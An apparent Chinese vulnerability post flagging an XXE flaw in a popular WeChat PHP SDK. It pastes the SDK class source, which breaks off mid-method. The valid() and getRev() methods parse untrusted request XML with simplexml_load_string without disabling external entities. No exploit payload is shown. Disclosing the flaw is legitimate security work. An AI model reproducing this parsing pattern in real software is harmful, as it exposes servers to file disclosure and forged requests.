一个用得比较广的微信API的XXE外部实体注入漏洞
文件地址:
https://github.com/dodgepudding/wechat-php-sdk/raw/master/wechat.class.php
代码:
<?php /** * 微信公众平台PHP-SDK, 官方API部分 * @author dodge <dodgepudding@gmail.com> * @link https://github.com/dodgepudding/wechat-php-sdk * @version 1.2 * usage: * $options = array( * \'token\'=>\'tokenaccesskey\', //填写你设定的key * \'encodingaeskey\'=>\'encodingaeskey\', //填写加密用的EncodingAESKey * \'appid\'=>\'wxdk1234567890\', //填写高级调用功能的app id * \'appsecret\'=>\'xxxxxxxxxxxxxxxxxxx\' //填写高级调用功能的密钥 * ); * $weObj = new Wechat($options); * $weObj->valid(); * $type = $weObj->getRev()->getRevType(); * switch($type) { * case Wechat::MSGTYPE_TEXT: * $weObj->text("hello, I\'m wechat")->reply(); * exit; * break; * case Wechat::MSGTYPE_EVENT: * .... * break; * case Wechat::MSGTYPE_IMAGE: * ... * break; * default: * $weObj->text("help info")->reply(); * } * * //获取菜单操作: * $menu = $weObj->getMenu(); * //设置菜单 * $newmenu = array( * "button"=> * array( * array(\'type\'=>\'click\',\'name\'=>\'最新消息\',\'key\'=>\'MENU_KEY_NEWS\'), * array(\'type\'=>\'view\',\'name\'=>\'我要搜索\',\'url\'=>\'http://www.baidu.com\'), * ) * ); * $result = $weObj->createMenu($newmenu); */ class Wechat { const MSGTYPE_TEXT = \'text\'; const MSGTYPE_IMAGE = \'image\'; const MSGTYPE_LOCATION = \'location\'; const MSGTYPE_LINK = \'link\'; const MSGTYPE_EVENT = \'event\'; const MSGTYPE_MUSIC = \'music\'; const MSGTYPE_NEWS = \'news\'; const MSGTYPE_VOICE = \'voice\'; const MSGTYPE_VIDEO = \'video\'; const EVENT_SUBSCRIBE = \'subscribe\'; //订阅 const EVENT_UNSUBSCRIBE = \'unsubscribe\'; //取消订阅 const EVENT_SCAN = \'SCAN\'; //扫描带参数二维码 const EVENT_LOCATION = \'LOCATION\'; //上报地理位置 const EVENT_MENU_VIEW = \'VIEW\'; //菜单 - 点击菜单跳转链接 const EVENT_MENU_CLICK = \'CLICK\'; //菜单 - 点击菜单拉取消息 const EVENT_MENU_SCAN_PUSH = \'scancode_push\'; //菜单 - 扫码推事件(客户端跳URL) const EVENT_MENU_SCAN_WAITMSG = \'scancode_waitmsg\'; //菜单 - 扫码推事件(客户端不跳URL) const EVENT_MENU_PIC_SYS = \'pic_sysphoto\'; //菜单 - 弹出系统拍照发图 const EVENT_MENU_PIC_PHOTO = \'pic_photo_or_album\'; //菜单 - 弹出拍照或者相册发图 const EVENT_MENU_PIC_WEIXIN = \'pic_weixin\'; //菜单 - 弹出微信相册发图器 const EVENT_MENU_LOCATION = \'location_select\'; //菜单 - 弹出地理位置选择器 const EVENT_SEND_MASS = \'MASSSENDJOBFINISH\'; //发送结果 - 高级群发完成 const EVENT_SEND_TEMPLATE = \'TEMPLATESENDJOBFINISH\';//发送结果 - 模板消息发送结果 const EVENT_KF_SEESION_CREATE = \'kfcreatesession\'; //多客服 - 接入会话 const EVENT_KF_SEESION_CLOSE = \'kfclosesession\'; //多客服 - 关闭会话 const EVENT_KF_SEESION_SWITCH = \'kfswitchsession\'; //多客服 - 转接会话 const EVENT_CARD_PASS = \'card_pass_check\'; //卡券 - 审核通过 const EVENT_CARD_NOTPASS = \'card_not_pass_check\'; //卡券 - 审核未通过 const EVENT_CARD_USER_GET = \'user_get_card\'; //卡券 - 用户领取卡券 const EVENT_CARD_USER_DEL = \'user_del_card\'; //卡券 - 用户删除卡券 const API_URL_PREFIX = \'https://api.weixin.qq.com/cgi-bin\'; const AUTH_URL = \'/token?grant_type=client_credential&\'; const MENU_CREATE_URL = \'/menu/create?\'; const MENU_GET_URL = \'/menu/get?\'; const MENU_DELETE_URL = \'/menu/delete?\'; const GET_TICKET_URL = \'/ticket/getticket?\'; const CALLBACKSERVER_GET_URL = \'/getcallbackip?\'; const QRCODE_CREATE_URL=\'/qrcode/create?\'; const QR_SCENE = 0; const QR_LIMIT_SCENE = 1; const QRCODE_IMG_URL=\'https://mp.weixin.qq.com/cgi-bin/showqrcode?ticket=\'; const SHORT_URL=\'/shorturl?\'; const USER_GET_URL=\'/user/get?\'; const USER_INFO_URL=\'/user/info?\'; const USER_UPDATEREMARK_URL=\'/user/info/updateremark?\'; const GROUP_GET_URL=\'/groups/get?\'; const USER_GROUP_URL=\'/groups/getid?\'; const GROUP_CREATE_URL=\'/groups/create?\'; const GROUP_UPDATE_URL=\'/groups/update?\'; const GROUP_MEMBER_UPDATE_URL=\'/groups/members/update?\'; const GROUP_MEMBER_BATCHUPDATE_URL=\'/groups/members/batchupdate?\'; const CUSTOM_SEND_URL=\'/message/custom/send?\'; const MEDIA_UPLOADNEWS_URL = \'/media/uploadnews?\'; const MASS_SEND_URL = \'/message/mass/send?\'; const TEMPLATE_SET_INDUSTRY_URL = \'/message/template/api_set_industry?\'; const TEMPLATE_ADD_TPL_URL = \'/message/template/api_add_template?\'; const TEMPLATE_SEND_URL = \'/message/template/send?\'; const MASS_SEND_GROUP_URL = \'/message/mass/sendall?\'; const MASS_DELETE_URL = \'/message/mass/delete?\'; const MASS_PREVIEW_URL = \'/message/mass/preview?\'; const MASS_QUERY_URL = \'/message/mass/get?\'; const UPLOAD_MEDIA_URL = \'http://file.api.weixin.qq.com/cgi-bin\'; const MEDIA_UPLOAD_URL = \'/media/upload?\'; const MEDIA_UPLOADIMG_URL = \'/media/uploadimg?\';//图片上传接口 const MEDIA_GET_URL = \'/media/get?\'; const MEDIA_VIDEO_UPLOAD = \'/media/uploadvideo?\'; const MEDIA_FOREVER_UPLOAD_URL = \'/material/add_material?\'; const MEDIA_FOREVER_NEWS_UPLOAD_URL = \'/material/add_news?\'; const MEDIA_FOREVER_NEWS_UPDATE_URL = \'/material/update_news?\'; const MEDIA_FOREVER_GET_URL = \'/material/get_material?\'; const MEDIA_FOREVER_DEL_URL = \'/material/del_material?\'; const MEDIA_FOREVER_COUNT_URL = \'/material/get_materialcount?\'; const MEDIA_FOREVER_BATCHGET_URL = \'/material/batchget_material?\'; const OAUTH_PREFIX = \'https://open.weixin.qq.com/connect/oauth2\'; const OAUTH_AUTHORIZE_URL = \'/authorize?\'; ///多客服相关地址 const CUSTOM_SERVICE_GET_RECORD = \'/customservice/getrecord?\'; const CUSTOM_SERVICE_GET_KFLIST = \'/customservice/getkflist?\'; const CUSTOM_SERVICE_GET_ONLINEKFLIST = \'/customservice/getonlinekflist?\'; const API_BASE_URL_PREFIX = \'https://api.weixin.qq.com\'; //以下API接口URL需要使用此前缀 const OAUTH_TOKEN_URL = \'/sns/oauth2/access_token?\'; const OAUTH_REFRESH_URL = \'/sns/oauth2/refresh_token?\'; const OAUTH_USERINFO_URL = \'/sns/userinfo?\'; const OAUTH_AUTH_URL = \'/sns/auth?\'; ///多客服相关地址 const CUSTOM_SESSION_CREATE = \'/customservice/kfsession/create?\'; const CUSTOM_SESSION_CLOSE = \'/customservice/kfsession/close?\'; const CUSTOM_SESSION_SWITCH = \'/customservice/kfsession/switch?\'; const CUSTOM_SESSION_GET = \'/customservice/kfsession/getsession?\'; const CUSTOM_SESSION_GET_LIST = \'/customservice/kfsession/getsessionlist?\'; const CUSTOM_SESSION_GET_WAIT = \'/customservice/kfsession/getwaitcase?\'; const CS_KF_ACCOUNT_ADD_URL = \'/customservice/kfaccount/add?\'; const CS_KF_ACCOUNT_UPDATE_URL = \'/customservice/kfaccount/update?\'; const CS_KF_ACCOUNT_DEL_URL = \'/customservice/kfaccount/del?\'; const CS_KF_ACCOUNT_UPLOAD_HEADIMG_URL = \'/customservice/kfaccount/uploadheadimg?\'; ///卡券相关地址 const CARD_CREATE = \'/card/create?\'; const CARD_DELETE = \'/card/delete?\'; const CARD_UPDATE = \'/card/update?\'; const CARD_GET = \'/card/get?\'; const CARD_BATCHGET = \'/card/batchget?\'; const CARD_MODIFY_STOCK = \'/card/modifystock?\'; const CARD_LOCATION_BATCHADD = \'/card/location/batchadd?\'; const CARD_LOCATION_BATCHGET = \'/card/location/batchget?\'; const CARD_GETCOLORS = \'/card/getcolors?\'; const CARD_QRCODE_CREATE = \'/card/qrcode/create?\'; const CARD_CODE_CONSUME = \'/card/code/consume?\'; const CARD_CODE_DECRYPT = \'/card/code/decrypt?\'; const CARD_CODE_GET = \'/card/code/get?\'; const CARD_CODE_UPDATE = \'/card/code/update?\'; const CARD_CODE_UNAVAILABLE = \'/card/code/unavailable?\'; const CARD_TESTWHILELIST_SET = \'/card/testwhitelist/set?\'; const CARD_MEETINGCARD_UPDATEUSER = \'/card/meetingticket/updateuser?\'; //更新会议门票 const CARD_MEMBERCARD_ACTIVATE = \'/card/membercard/activate?\'; //激活会员卡 const CARD_MEMBERCARD_UPDATEUSER = \'/card/membercard/updateuser?\'; //更新会员卡 const CARD_MOVIETICKET_UPDATEUSER = \'/card/movieticket/updateuser?\'; //更新电影票(未加方法) const CARD_BOARDINGPASS_CHECKIN = \'/card/boardingpass/checkin?\'; //飞机票-在线选座(未加方法) const CARD_LUCKYMONEY_UPDATE = \'/card/luckymoney/updateuserbalance?\'; //更新红包金额 const SEMANTIC_API_URL = \'/semantic/semproxy/search?\'; //语义理解 ///数据分析接口 static $DATACUBE_URL_ARR = array( //用户分析 \'user\' => array( \'summary\' => \'/datacube/getusersummary?\', //获取用户增减数据(getusersummary) \'cumulate\' => \'/datacube/getusercumulate?\', //获取累计用户数据(getusercumulate) ), \'article\' => array( //图文分析 \'summary\' => \'/datacube/getarticlesummary?\', //获取图文群发每日数据(getarticlesummary) \'total\' => \'/datacube/getarticletotal?\', //获取图文群发总数据(getarticletotal) \'read\' => \'/datacube/getuserread?\', //获取图文统计数据(getuserread) \'readhour\' => \'/datacube/getuserreadhour?\', //获取图文统计分时数据(getuserreadhour) \'share\' => \'/datacube/getusershare?\', //获取图文分享转发数据(getusershare) \'sharehour\' => \'/datacube/getusersharehour?\', //获取图文分享转发分时数据(getusersharehour) ), \'upstreammsg\' => array( //消息分析 \'summary\' => \'/datacube/getupstreammsg?\', //获取消息发送概况数据(getupstreammsg) \'hour\' => \'/datacube/getupstreammsghour?\', //获取消息分送分时数据(getupstreammsghour) \'week\' => \'/datacube/getupstreammsgweek?\', //获取消息发送周数据(getupstreammsgweek) \'month\' => \'/datacube/getupstreammsgmonth?\', //获取消息发送月数据(getupstreammsgmonth) \'dist\' => \'/datacube/getupstreammsgdist?\', //获取消息发送分布数据(getupstreammsgdist) \'distweek\' => \'/datacube/getupstreammsgdistweek?\', //获取消息发送分布周数据(getupstreammsgdistweek) \'distmonth\' => \'/datacube/getupstreammsgdistmonth?\', //获取消息发送分布月数据(getupstreammsgdistmonth) ), \'interface\' => array( //接口分析 \'summary\' => \'/datacube/getinterfacesummary?\', //获取接口分析数据(getinterfacesummary) \'summaryhour\' => \'/datacube/getinterfacesummaryhour?\', //获取接口分析分时数据(getinterfacesummaryhour) ) ); ///微信摇一摇周边 const SHAKEAROUND_DEVICE_APPLYID = \'/shakearound/device/applyid?\';//申请设备ID const SHAKEAROUND_DEVICE_UPDATE = \'/shakearound/device/update?\';//编辑设备信息 const SHAKEAROUND_DEVICE_SEARCH = \'/shakearound/device/search?\';//查询设备列表 const SHAKEAROUND_DEVICE_BINDLOCATION = \'/shakearound/device/bindlocation?\';//配置设备与门店ID的关系 const SHAKEAROUND_DEVICE_BINDPAGE = \'/shakearound/device/bindpage?\';//配置设备与页面的绑定关系 const SHAKEAROUND_MATERIAL_ADD = \'/shakearound/material/add?\';//上传摇一摇图片素材 const SHAKEAROUND_PAGE_ADD = \'/shakearound/page/add?\';//增加页面 const SHAKEAROUND_PAGE_UPDATE = \'/shakearound/page/update?\';//编辑页面 const SHAKEAROUND_PAGE_SEARCH = \'/shakearound/page/search?\';//查询页面列表 const SHAKEAROUND_PAGE_DELETE = \'/shakearound/page/delete?\';//删除页面 const SHAKEAROUND_USER_GETSHAKEINFO = \'/shakearound/user/getshakeinfo?\';//获取摇周边的设备及用户信息 const SHAKEAROUND_STATISTICS_DEVICE = \'/shakearound/statistics/device?\';//以设备为维度的数据统计接口 const SHAKEAROUND_STATISTICS_PAGE = \'/shakearound/statistics/page?\';//以页面为维度的数据统计接口 private $token; private $encodingAesKey; private $encrypt_type; private $appid; private $appsecret; private $access_token; private $jsapi_ticket; private $api_ticket; private $user_token; private $partnerid; private $partnerkey; private $paysignkey; private $postxml; private $_msg; private $_funcflag = false; private $_receive; private $_text_filter = true; public $debug = false; public $errCode = 40001; public $errMsg = "no access"; public $logcallback; public function __construct($options) { $this->token = isset($options[\'token\'])?$options[\'token\']:\'\'; $this->encodingAesKey = isset($options[\'encodingaeskey\'])?$options[\'encodingaeskey\']:\'\'; $this->appid = isset($options[\'appid\'])?$options[\'appid\']:\'\'; $this->appsecret = isset($options[\'appsecret\'])?$options[\'appsecret\']:\'\'; $this->debug = isset($options[\'debug\'])?$options[\'debug\']:false; $this->logcallback = isset($options[\'logcallback\'])?$options[\'logcallback\']:false; } /** * For weixin server validation */ private function checkSignature($str=\'\') { $signature = isset($_GET["signature"])?$_GET["signature"]:\'\'; $signature = isset($_GET["msg_signature"])?$_GET["msg_signature"]:$signature; //如果存在加密验证则用加密验证段 $timestamp = isset($_GET["timestamp"])?$_GET["timestamp"]:\'\'; $nonce = isset($_GET["nonce"])?$_GET["nonce"]:\'\'; $token = $this->token; $tmpArr = array($token, $timestamp, $nonce,$str); sort($tmpArr, SORT_STRING); $tmpStr = implode( $tmpArr ); $tmpStr = sha1( $tmpStr ); if( $tmpStr == $signature ){ return true; }else{ return false; } } /** * For weixin server validation * @param bool $return 是否返回 */ public function valid($return=false) { $encryptStr=""; if ($_SERVER[\'REQUEST_METHOD\'] == "POST") { $postStr = file_get_contents("php://input"); $array = (array)simplexml_load_string($postStr, \'SimpleXMLElement\', LIBXML_NOCDATA); $this->encrypt_type = isset($_GET["encrypt_type"]) ? $_GET["encrypt_type"]: \'\'; if ($this->encrypt_type == \'aes\') { //aes加密 $this->log($postStr); $encryptStr = $array[\'Encrypt\']; $pc = new Prpcrypt($this->encodingAesKey); $array = $pc->decrypt($encryptStr,$this->appid); if (!isset($array[0]) || ($array[0] != 0)) { if (!$return) { die(\'decrypt error!\'); } else { return false; } } $this->postxml = $array[1]; if (!$this->appid) $this->appid = $array[2];//为了没有appid的订阅号。 } else { $this->postxml = $postStr; } } elseif (isset($_GET["echostr"])) { $echoStr = $_GET["echostr"]; if ($return) { if ($this->checkSignature()) return $echoStr; else return false; } else { if ($this->checkSignature()) die($echoStr); else die(\'no access\'); } } if (!$this->checkSignature($encryptStr)) { if ($return) return false; else die(\'no access\'); } return true; } /** * 设置发送消息 * @param array $msg 消息数组 * @param bool $append 是否在原消息数组追加 */ public function Message($msg = \'\',$append = false){ if (is_null($msg)) { $this->_msg =array(); }elseif (is_array($msg)) { if ($append) $this->_msg = array_merge($this->_msg,$msg); else $this->_msg = $msg; return $this->_msg; } else { return $this->_msg; } } /** * 设置消息的星标标志,官方已取消对此功能的支持 */ public function setFuncFlag($flag) { $this->_funcflag = $flag; return $this; } /** * 日志记录,可被重载。 * @param mixed $log 输入日志 * @return mixed */ protected function log($log){ if ($this->debug && function_exists($this->logcallback)) { if (is_array($log)) $log = print_r($log,true); return call_user_func($this->logcallback,$log); } } /** * 获取微信服务器发来的信息 */ public function getRev() { if ($this->_receive) return $this; $postStr = !empty($this->postxml)?$this->postxml:file_get_contents("php://input"); //兼顾使用明文又不想调用valid()方法的情况 $this->log($postStr); if (!empty($postStr)) { $this->_receive = (array)simplexml_load_string($postStr, \'SimpleXMLElement\', LIBXML_NOCDATA); } return $this; } /** * 获取微信服务器发来的信息 */ public function getRevData() { return $this->_receive; } /** * 获取消息发送者 */ public function getRevFrom() { if (isset($this->_receive[\'FromUserName\'])) return $this->_receive[\'FromUserName\']; else return false; } /** * 获取消息接受者 */ public function getRevTo() { if (isset($this->_receive[\'ToUserName\'])) return $this->_receive[\'ToUserName\']; else return false; } /** * 获取接收消息的类型 */ public function getRevType() { if (isset($this->_receive[\'MsgType\'])) return $this->_receive[\'MsgType\']; else return false; } /** * 获取消息ID */ public function getRevID() { if (isset($this->_receive[\'MsgId\'])) return $this->_receive[\'MsgId\']; else return false; } /** * 获取消息发送时间 */ public function getRevCtime() { if (isset($this->_receive[\'CreateTime\'])) return $this->_receive[\'CreateTime\']; else return false; } /** * 获取接收消息内容正文 */ public function getRevContent(){ if (isset($this->_receive[\'Content\'])) return $this->_receive[\'Content\']; else if (isset($this->_receive[\'Recognition\'])) //获取语音识别文字内容,需申请开通 return $this->_receive[\'Recognition\']; else return false; } /** * 获取接收消息图片 */ public function getRevPic(){ if (isset($this->_receive[\'PicUrl\'])) return array( \'mediaid\'=>$this->_receive[\'MediaId\'], \'picurl\'=>(string)$this->_receive[\'PicUrl\'], //防止picurl为空导致解析出错 ); else return false; } /** * 获取接收消息链接 */ public function getRevLink(){ if (isset($this->_receive[\'Url\'])){ return array( \'url\'=>$this->_receive[\'Url\'], \'title\'=>$this->_receive[\'Title\'], \'description\'=>$this->_receive[\'Description\'] ); } else return false; } /** * 获取接收地理位置 */ public function getRevGeo(){ if (isset($this->_receive[\'Location_X\'])){ return array( \'x\'=>$this->_receive[\'Location_X\'], \'y\'=>$this->_receive[\'Location_Y\'], \'scale\'=>$this->_receive[\'Scale\'], \'label\'=>$this->_receive[\'Label\'] ); } else return false; } /** * 获取上报地理位置事件 */ public function getRevEventGeo(){ if (isset($this->_receive[\'Latitude\'])){ return array( \'x\'=>$this->_receive[\'Latitude\'], \'y\'=>$this->_receive[\'Longitude\'], \'precision\'=>$this->_receive[\'Precision\'], ); } else return false; } /** * 获取接收事件推送 */ public function getRevEvent(){ if (isset($this->_receive[\'Event\'])){ $array[\'event\'] = $this->_receive[\'Event\']; } if (isset($this->_receive[\'EventKey\'])){ $array[\'key\'] = $this->_receive[\'EventKey\']; } if (isset($array) && count($array) > 0) { return $array; } else { return false; } } /** * 获取自定义菜单的扫码推事件信息 * * 事件类型为以下两种时则调用此方法有效 * Event 事件类型,scancode_push * Event 事件类型,scancode_waitmsg * * @return: array | false * array ( * \'ScanType\'=>\'qrcode\', * \'ScanResult\'=>\'123123\' * ) */ public function getRevScanInfo(){ if (isset($this->_receive[\'ScanCodeInfo\'])){ if (!is_array($this->_receive[\'ScanCodeInfo\'])) { $array=(array)$this->_receive[\'ScanCodeInfo\']; $this->_receive[\'ScanCodeInfo\']=$array; }else { $array=$this->_receive[\'ScanCodeInfo\']; } } if (isset($array) && count($array) > 0) { return $array; } else { return false; } } /** * 获取自定义菜单的图片发送事件信息 * * 事件类型为以下三种时则调用此方法有效 * Event 事件类型,pic_sysphoto 弹出系统拍照发图的事件推送 * Event 事件类型,pic_photo_or_album 弹出拍照或者相册发图的事件推送 * Event 事件类型,pic_weixin 弹出微信相册发图器的事件推送 * * @return: array | false * array ( * \'Count\' => \'2\', * \'PicList\' =>array ( * \'item\' =>array ( * 0 =>array (\'PicMd5Sum\' => \'aaae42617cf2a14342d96005af53624c\'), * 1 =>array (\'PicMd5Sum\' => \'149bd39e296860a2adc2f1bb81616ff8\'), * ), * ), * ) * */ public function getRevSendPicsInfo(){ if (isset($this->_receive[\'SendPicsInfo\'])){ if (!is_array($this->_receive[\'SendPicsInfo\'])) { $array=(array)$this->_receive[\'SendPicsInfo\']; if (isset($array[\'PicList\'])){ $array[\'PicList\']=(array)$array[\'PicList\']; $item=$array[\'PicList\'][\'item\']; $array[\'PicList\'][\'item\']=array(); foreach ( $item as $key => $value ){ $array[\'PicList\'][\'item\'][$key]=(array)$value; } } $this->_receive[\'SendPicsInfo\']=$array; } else { $array=$this->_receive[\'SendPicsInfo\']; } } if (isset($array) && count($array) > 0) { return $array; } else { return false; } } /** * 获取自定义菜单的地理位置选择器事件推送 * * 事件类型为以下时则可以调用此方法有效 * Event 事件类型,location_select 弹出地理位置选择器的事件推送 * * @return: array | false * array ( * \'Location_X\' => \'33.731655000061\', * \'Location_Y\' => \'113.29955200008047\', * \'Scale\' => \'16\', * \'Label\' => \'某某市某某区某某路\', * \'Poiname\' => \'\', * ) * */ public function getRevSendGeoInfo(){ if (isset($this->_receive[\'SendLocationInfo\'])){ if (!is_array($this->_receive[\'SendLocationInfo\'])) { $array=(array)$this->_receive[\'SendLocationInfo\']; if (empty($array[\'Poiname\'])) { $array[\'Poiname\']=""; } if (empty($array[\'Label\'])) { $array[\'Label\']=""; } $this->_receive[\'SendLocationInfo\']=$array; } else { $array=$this->_receive[\'SendLocationInfo\']; } } if (isset($array) && count($array) > 0) { return $array; } else { return false; } } /** * 获取接收语音推送 */ public function getRevVoice(){ if (isset($this->_receive[\'MediaId\'])){ return array( \'mediaid\'=>$this->_receive[\'MediaId\'], \'format\'=>$this->_receive[\'Format\'], ); } else return false; } /** * 获取接收视频推送 */ public function getRevVideo(){ if (isset($this->_receive[\'MediaId\'])){ return array( \'mediaid\'=>$this->_receive[\'MediaId\'], \'thumbmediaid\'=>$this->_receive[\'ThumbMediaId\'] ); } else return false; } /** * 获取接收TICKET */ public function getRevTicket(){ if (isset($this->_receive[\'Ticket\'])){ return $this->_receive[\'Ticket\']; } else return false; } /** * 获取二维码的场景值 */ public function getRevSceneId (){ if (isset($this->_receive[\'EventKey\'])){ return str_replace(\'qrscene_\',\'\',$this->_receive[\'EventKey\']); } else{ return false; } } /** * 获取主动推送的消息ID * 经过验证,这个和普通的消息MsgId不一样 * 当Event为 MASSSENDJOBFINISH 或 TEMPLATESENDJOBFINISH */ public function getRevTplMsgID(){ if (isset($this->_receive[\'MsgID\'])){ return $this->_receive[\'MsgID\']; } else return false; } /** * 获取模板消息发送状态 */ public function getRevStatus(){ if (isset($this->_receive[\'Status\'])){ return $this->_receive[\'Status\']; } else return false; } /** * 获取群发或模板消息发送结果 * 当Event为 MASSSENDJOBFINISH 或 TEMPLATESENDJOBFINISH,即高级群发/模板消息 */ public function getRevResult(){ if (isset($this->_receive[\'Status\'])) //发送是否成功,具体的返回值请参考 高级群发/模板消息 的事件推送说明 $array[\'Status\'] = $this->_receive[\'Status\']; if (isset($this->_receive[\'MsgID\'])) //发送的消息id $array[\'MsgID\'] = $this->_receive[\'MsgID\']; //以下仅当群发消息时才会有的事件内容 if (isset($this->_receive[\'TotalCount\'])) //分组或openid列表内粉丝数量 $array[\'TotalCount\'] = $this->_receive[\'TotalCount\']; if (isset($this->_receive[\'FilterCount\'])) //过滤(过滤是指特定地区、性别的过滤、用户设置拒收的过滤,用户接收已超4条的过滤)后,准备发送的粉丝数 $array[\'FilterCount\'] = $this->_receive[\'FilterCount\']; if (isset($this->_receive[\'SentCount\'])) //发送成功的粉丝数 $array[\'SentCount\'] = $this->_receive[\'SentCount\']; if (isset($this->_receive[\'ErrorCount\'])) //发送失败的粉丝数 $array[\'ErrorCount\'] = $this->_receive[\'ErrorCount\']; if (isset($array) && count($array) > 0) { return $array; } else { return false; } } /** * 获取多客服会话状态推送事件 - 接入会话 * 当Event为 kfcreatesession 即接入会话 * @return string | boolean 返回分配到的客服 */ public function getRevKFCreate(){ if (isset($this->_receive[\'KfAccount\'])){ return $this->_receive[\'KfAccount\']; } else return false; } /** * 获取多客服会话状态推送事件 - 关闭会话 * 当Event为 kfclosesession 即关闭会话 * @return string | boolean 返回分配到的客服 */ public function getRevKFClose(){ if (isset($this->_receive[\'KfAccount\'])){ return $this->_receive[\'KfAccount\']; } else return false; } /** * 获取多客服会话状态推送事件 - 转接会话 * 当Event为 kfswitchsession 即转接会话 * @return array | boolean 返回分配到的客服 * { * \'FromKfAccount\' => \'\', //原接入客服 * \'ToKfAccount\' => \'\' //转接到客服 * } */ public function getRevKFSwitch(){ if (isset($this->_receive[\'FromKfAccount\'])) //原接入客服 $array[\'FromKfAccount\'] = $this->_receive[\'FromKfAccount\']; if (isset($this->_receive[\'ToKfAccount\'])) //转接到客服 $array[\'ToKfAccount\'] = $this->_receive[\'ToKfAccount\']; if (isset($array) && count($array) > 0) { return $array; } else { return false; } } /** * 获取卡券事件推送 - 卡卷审核是否通过 * 当Event为 card_pass_check(审核通过) 或 card_not_pass_check(未通过) * @return string|boolean 返回卡券ID */ public function getRevCardPass(){ if (isset($this->_receive[\'CardId\'])) return $this->_receive[\'CardId\']; else return false; } /** * 获取卡券事件推送 - 领取卡券 * 当Event为 user_get_card(用户领取卡券) * @return array|boolean */ public function getRevCardGet(){ if (isset($this->_receive[\'CardId\'])) //卡券 ID $array[\'CardId\'] = $this->_receive[\'CardId\']; if (isset($this->_receive[\'IsGiveByFriend\'])) //是否为转赠,1 代表是,0 代表否。 $array[\'IsGiveByFriend\'] = $this->_receive[\'IsGiveByFriend\']; $array[\'OldUserCardCode\'] = $this->_receive[\'OldUserCardCode\']; if (isset($this->_receive[\'UserCardCode\']) && !empty($this->_receive[\'UserCardCode\'])) //code 序列号。自定义 code 及非自定义 code的卡券被领取后都支持事件推送。 $array[\'UserCardCode\'] = $this->_receive[\'UserCardCode\']; if (isset($array) && count($array) > 0) { return $array; } else { return false; } } /** * 获取卡券事件推送 - 删除卡券 * 当Event为 user_del_card(用户删除卡券) * @return array|boolean */ public function getRevCardDel(){ if (isset($this->_receive[\'CardId\'])) //卡券 ID $array[\'CardId\'] = $this->_receive[\'CardId\']; if (isset($this->_receive[\'UserCardCode\']) && !empty($this->_receive[\'UserCardCode\'])) //code 序列号。自定义 code 及非自定义 code的卡券被领取后都支持事件推送。 $array[\'UserCardCode\'] = $this->_receive[\'UserCardCode\']; if (isset($array) && count($array) > 0) { return $array; } else { return false; } } public static function xmlSafeStr($str) { return \'<![CDATA[\'.preg_replace("/[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]/",\'\',$str).\']]>\'; } /** * 数据XML编码 * @param mixed $data 数据 * @return string */ public static function data_to_xml($data) { $xml = \'\'; foreach ($data as $key => $val) { is_numeric($key) && $key = "item id=\"$key\""; $xml .= "<$key>"; $xml .= ( is_array($val) || is_object($val)) ? self::data_to_xml($val) : self::xmlSafeStr($val); list($key, ) = explode(\' \', $key); $xml .= "</$key>"; } return $xml; } /** * XML编码 * @param mixed $data 数据 * @param string $root 根节点名 * @param string $item 数字索引的子节点名 * @param string $attr 根节点属性 * @param string $id 数字索引子节点key转换的属性名 * @param string $encoding 数据编码 * @return string */ public function xml_encode($data, $root=\'xml\', $item=\'item\', $attr=\'\', $id=\'id\', $encoding=\'utf-8\') { if(is_array($attr)){ $_attr = array(); foreach ($attr as $key => $value) { $_attr[] = "{$key}=\"{$value}\""; } $attr = implode(\' \', $_attr); } $attr = trim($attr); $attr = empty($attr) ? \'\' : " {$attr}"; $xml = "<{$root}{$attr}>"; $xml .= self::data_to_xml($data, $item, $id); $xml .= "</{$root}>"; return $xml; } /** * 过滤文字回复\r\n换行符 * @param string $text * @return string|mixed */ private function _auto_text_filter($text) { if (!$this->_text_filter) return $text; return str_replace("\r\n", "\n", $text); } /** * 设置回复消息 * Example: $obj->text(\'hello\')->reply(); * @param string $text */ public function text($text=\'\') { $FuncFlag = $this->_funcflag ? 1 : 0; $msg = array( \'ToUserName\' => $this->getRevFrom(), \'FromUserName\'=>$this->getRevTo(), \'MsgType\'=>self::MSGTYPE_TEXT, \'Content\'=>$this->_auto_text_filter($text), \'CreateTime\'=>time(), \'FuncFlag\'=>$FuncFlag ); $this->Message($msg); return $this; } /** * 设置回复消息 * Example: $obj->image(\'media_id\')->reply(); * @param string $mediaid */ public function image($mediaid=\'\') { $FuncFlag = $this->_funcflag ? 1 : 0; $msg = array( \'ToUserName\' => $this->getRevFrom(), \'FromUserName\'=>$this->getRevTo(), \'MsgType\'=>self::MSGTYPE_IMAGE, \'Image\'=>array(\'MediaId\'=>$mediaid), \'CreateTime\'=>time(), \'FuncFlag\'=>$FuncFlag ); $this->Message($msg); return $this; } /** * 设置回复消息 * Example: $obj->voice(\'media_id\')->reply(); * @param string $mediaid */ public function voice($mediaid=\'\') { $FuncFlag = $this->_funcflag ? 1 : 0; $msg = array( \'ToUserName\' => $this->getRevFrom(), \'FromUserName\'=>$this->getRevTo(), \'MsgType\'=>self::MSGTYPE_VOICE, \'Voice\'=>array(\'MediaId\'=>$mediaid), \'CreateTime\'=>time(), \'FuncFlag\'=>$FuncFlag ); $this->Message($msg); return $this; } /** * 设置回复消息 * Example: $obj->video(\'media_id\',\'title\',\'description\')->reply(); * @param string $mediaid */ public function video($mediaid=\'\',$title=\'\',$description=\'\') { $FuncFlag = $this->_funcflag ? 1 : 0; $msg = array( \'ToUserName\' => $this->getRevFrom(), \'FromUserName\'=>$this->getRevTo(), \'MsgType\'=>self::MSGTYPE_VIDEO, \'Video\'=>array( \'MediaId\'=>$mediaid, \'Title\'=>$title, \'Description\'=>$description ), \'CreateTime\'=>time(), \'FuncFlag\'=>$FuncFlag ); $this->Message($msg); return $this; } /** * 设置回复音乐 * @param string $title * @param string $desc * @param string $musicurl * @param string $hgmusicurl * @param string $thumbmediaid 音乐图片缩略图的媒体id,非必须 */ public function music($title,$desc,$musicurl,$hgmusicurl=\'\',$thumbmediaid=\'\') { $FuncFlag = $this->_funcflag ? 1 : 0; $msg = array( \'ToUserName\' => $this->getRevFrom(), \'FromUserName\'=>$this->getRevTo(), \'CreateTime\'=>time(), \'MsgType\'=>self::MSGTYPE_MUSIC, \'Music\'=>array( \'Title\'=>$title, \'Description\'=>$desc, \'MusicUrl\'=>$musicurl, \'HQMusicUrl\'=>$hgmusicurl ), \'FuncFlag\'=>$FuncFlag ); if ($thumbmediaid) { $msg[\'Music\'][\'ThumbMediaId\'] = $thumbmediaid; } $this->Message($msg); return $this; } /** * 设置回复图文 * @param array $newsData * 数组结构: * array( * "0"=>array( * \'Title\'=>\'msg title\', * 